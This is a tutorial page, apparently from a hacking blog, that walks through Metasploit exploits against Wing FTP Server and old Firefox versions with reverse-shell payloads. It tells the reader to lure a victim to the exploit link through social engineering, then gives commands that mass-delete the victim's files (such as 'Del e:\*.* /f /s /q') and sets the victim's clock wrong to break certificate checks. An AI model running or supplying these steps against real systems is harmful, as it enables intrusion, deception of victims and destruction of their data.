Hack Remote Windows PC using Wing FTP Server Authenticated Command Execution

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets
Wing FTP 4.3.8

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/ftp/wing_ftp_admin_exec
msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp
msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)
msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)
msf exploit (wing_ftp_admin_exec)>set username rajchandel
msf exploit (wing_ftp_admin_exec)>set password --------
msf exploit (wing_ftp_admin_exec)>exploit  



Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection

This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs

Exploit Targets
Firefox 22-27
Windows XP SP 3
Windows 7
Linux
OSX

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/multi/browser/firefox_webidl_injection
msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)
msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5
msf exploit (firefox_webidl_injection)>set uripath /
msf exploit (firefox_webidl_injection)>exploit


Now an URL you should give to your victim http://192.168.0.5:8080

Send the link of the server to the victim via chat or email or any social engineering technique


Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


Hack Remote Windows, Linux, MAC PC using Firefox toString console.time Privileged JavaScript Injection

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges.

Exploit Targets
Firefox Version 15-22
Windows 7
Linux
Solaris
OSX

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/browser/firefox_tostring_console_injection
msf exploit (firefox_tostring_console_injection)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_tostring_console_injection)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (firefox_tostring_console_injection)>set srvhost 192.168.0.104
msf exploit (firefox_tostring_console_injection)>set uripath /
msf exploit (firefox_tostring_console_injection)>exploit


Now an URL you should give to your victim http://192.168.0.104:8080
Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


How to Delete ALL Types of Files in Remote PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Delete All EXE Files

Example, if I wanted to delete all exe file

Del e:\*.*  /f /s /q


Delete ALL Doc Files

Example, if I wanted to delete all MS Office Document file named File with the file extension .doc

Del e:\*.doc  /f /s /q


Delete ALL PDF Files

Example, if I wanted to delete all pdf file named File with the file extension .pdf

Del e:\*.pdf  /f /s /q


Delete ALL Images

Example, if I wanted to delete all PNG, JPEG, BMP file named File with the file extension .png .bmp .jpg

Del e:\*.png  /f /s /q



Delete ALL MP3 Files

Example, if I wanted to delete all MP3 Files named File with the file extension .mp3

Del e:\*.mp3  /f /s /q


Delete ALL MP4 Files

Example, if I wanted to delete all MP4 named File with the file extension .mp4

Del e:\*.mp4  /f /s /q


Delete ALL Power Point Files

Example, if I wanted to delete all MS Office Power Point file named File with the file extension .ppt

Del e:\*.ppt  /f /s /q

Website Security Certificate Attack on Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Type date and press enter. You’ll be prompted to enter a new date.


When Victim goes to a website He will get error message something like this:

There is a problem with this website’s security certificate. The security certificate presented by this website has expired or is not yet valid.”